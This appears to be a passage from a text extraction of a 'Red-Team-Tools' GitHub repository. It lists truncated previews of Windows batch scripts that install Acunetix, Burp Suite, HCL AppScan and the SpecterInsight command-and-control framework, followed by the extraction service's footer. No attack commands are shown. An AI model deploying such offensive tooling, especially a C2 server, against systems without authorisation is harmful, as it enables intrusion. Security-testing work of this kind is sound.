"preview": "@REM Acunetix Windows installer script made by ixve for Red-Team-Tools\necho off\ncls\n\ncls\necho.&&echo.\necho ^[0^/7^] Chec"
},
{
"path": "burpsuite_installer_windows.bat",
"chars": 7724,
"preview": "echo off\ntitle B.S.I.H.\ncls\necho Welcome to B.S.I.H. (Burp Suite Install Helper)\necho.\necho.\n\nREM Getting wget.exe using"
},
{
"path": "hclappscan_installer_windows.bat",
"chars": 574,
"preview": "@REM Simple HCL AppScan installer - ixve @ github.com/ixve/red-team-tools\necho off\ncls\n\necho.\necho [1/3] Installing HCL "
},
{
"path": "specterinsight_installer_windows.bat",
"chars": 3918,
"preview": "@REM SpecterInsight C2 Install Script - ixve @ github.com/ixve/red-team-tools\n\necho off\nsetlocal enabledelayedexpansion\n"
}
]
About this extraction
This page contains the full source code of the Ixve/Red-Team-Tools GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 5 files (23.6 KB), approximately 8.7k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.